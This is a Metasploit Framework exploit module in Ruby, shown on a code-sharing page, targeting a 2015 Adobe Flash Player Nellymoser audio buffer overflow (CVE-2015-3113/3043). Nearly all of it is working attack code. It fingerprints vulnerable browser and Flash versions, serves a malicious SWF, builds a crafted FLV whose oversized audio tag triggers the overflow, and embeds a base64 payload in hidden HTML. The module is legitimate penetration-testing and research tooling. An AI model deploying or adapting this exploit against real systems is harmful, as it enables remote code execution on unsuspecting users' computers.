Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/browser/adobe_flash_nellymoser_bof.rb
19715 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Exploit::Remote
7
Rank = GreatRanking
8
9
include Msf::Exploit::Remote::BrowserExploitServer
10
11
def initialize(info = {})
12
super(
13
update_info(
14
info,
15
'Name' => 'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow',
16
'Description' => %q{
17
This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser
18
encoded audio inside a FLV video, as exploited in the wild on June 2015. This module
19
has been tested successfully on:
20
21
Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160,
22
Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160,
23
Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160,
24
Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and
25
Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466.
26
27
Note that this exploit is effective against both CVE-2015-3113 and the
28
earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression
29
to the same root cause as CVE-2015-3043.
30
},
31
'License' => MSF_LICENSE,
32
'Author' => [
33
'Unknown', # Exploit in the wild
34
'juan vazquez' # msf module
35
],
36
'References' => [
37
['CVE', '2015-3043'],
38
['CVE', '2015-3113'],
39
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'],
40
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-14.html'],
41
['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-zero-day-shares-same-root-cause-as-older-flaws/'],
42
['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3113-flash-up-to-1800160-and.html'],
43
['URL', 'http://bobao.360.cn/learning/detail/357.html']
44
],
45
'Payload' => {
46
'DisableNops' => true
47
},
48
'Platform' => ['win', 'linux'],
49
'Arch' => [ARCH_X86],
50
'BrowserRequirements' => {
51
:source => /script|headers/i,
52
:arch => ARCH_X86,
53
:os_name => lambda do |os|
54
os =~ OperatingSystems::Match::LINUX ||
55
os =~ OperatingSystems::Match::WINDOWS_7 ||
56
os =~ OperatingSystems::Match::WINDOWS_81
57
end,
58
:ua_name => lambda do |ua|
59
case target.name
60
when 'Windows'
61
return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
62
when 'Linux'
63
return true if ua == Msf::HttpClients::FF
64
end
65
66
false
67
end,
68
:flash => lambda do |ver|
69
case target.name
70
when 'Windows'
71
return true if ver =~ /^18\./ && Rex::Version.new(ver) <= Rex::Version.new('18.0.0.161')
72
return true if ver =~ /^17\./ && Rex::Version.new(ver) != Rex::Version.new('17.0.0.169')
73
when 'Linux'
74
return true if ver =~ /^11\./ && Rex::Version.new(ver) <= Rex::Version.new('11.2.202.466') && Rex::Version.new(ver) != Rex::Version.new('11.2.202.457')
75
end
76
77
false
78
end
79
},
80
'Targets' => [
81
[
82
'Windows',
83
{
84
'Platform' => 'win'
85
}
86
],
87
[
88
'Linux',
89
{
90
'Platform' => 'linux'
91
}
92
]
93
],
94
'Privileged' => false,
95
'DisclosureDate' => '2015-06-23',
96
'DefaultTarget' => 0,
97
'Notes' => {
98
'Reliability' => UNKNOWN_RELIABILITY,
99
'Stability' => UNKNOWN_STABILITY,
100
'SideEffects' => UNKNOWN_SIDE_EFFECTS
101
}
102
)
103
)
104
end
105
106
def exploit
107
@swf = create_swf
108
@flv = create_flv
109
110
super
111
end
112
113
def on_request_exploit(cli, request, target_info)
114
print_status("Request: #{request.uri}")
115
116
if request.uri =~ /\.swf$/
117
print_status('Sending SWF...')
118
send_response(cli, @swf, { 'Content-Type' => 'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache' })
119
return
120
end
121
122
if request.uri =~ /\.flv$/
123
print_status('Sending FLV...')
124
send_response(cli, @flv, { 'Content-Type' => 'video/x-flv', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache' })
125
return
126
end
127
128
print_status('Sending HTML...')
129
send_exploit_html(cli, exploit_template(cli, target_info), { 'Pragma' => 'no-cache' })
130
end
131
132
def exploit_template(cli, target_info)
133
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
134
target_payload = get_payload(cli, target_info)
135
b64_payload = Rex::Text.encode_base64(target_payload)
136
os_name = target_info[:os_name]
137
138
if target.name =~ /Windows/
139
platform_id = 'win'
140
elsif target.name =~ /Linux/
141
platform_id = 'linux'
142
end
143
144
html_template = %Q|<html>
145
<body>
146
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
147
<param name="movie" value="<%=swf_random%>" />
148
<param name="allowScriptAccess" value="always" />
149
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
150
<param name="Play" value="true" />
151
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
152
</object>
153
</body>
154
</html>
155
|
156
157
return html_template, binding()
158
end
159
160
def create_swf
161
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3113', 'msf.swf')
162
swf = ::File.open(path, 'rb') { |f| swf = f.read }
163
164
swf
165
end
166
167
def create_flv
168
header = ''
169
header << 'FLV' # signature
170
header << [1].pack('C') # version
171
header << [4].pack('C') # Flags: TypeFlagsAudio
172
header << [9].pack('N') # DataOffset
173
174
data = ''
175
data << "\x68" # fmt = 6 (Nellymoser), SoundRate: 2, SoundSize: 0, SoundType: 0
176
data << "\xee" * 0x440 # SoundData
177
178
tag1 = ''
179
tag1 << [8].pack('C') # TagType (audio)
180
tag1 << "\x00\x04\x41" # DataSize
181
tag1 << "\x00\x00\x1a" # TimeStamp
182
tag1 << [0].pack('C') # TimeStampExtended
183
tag1 << "\x00\x00\x00" # StreamID, always 0
184
tag1 << data
185
186
body = ''
187
body << [0].pack('N') # PreviousTagSize
188
body << tag1
189
body << [0xeeeeeeee].pack('N') # PreviousTagSize
190
191
flv = ''
192
flv << header
193
flv << body
194
195
flv
196
end
197
end
198
199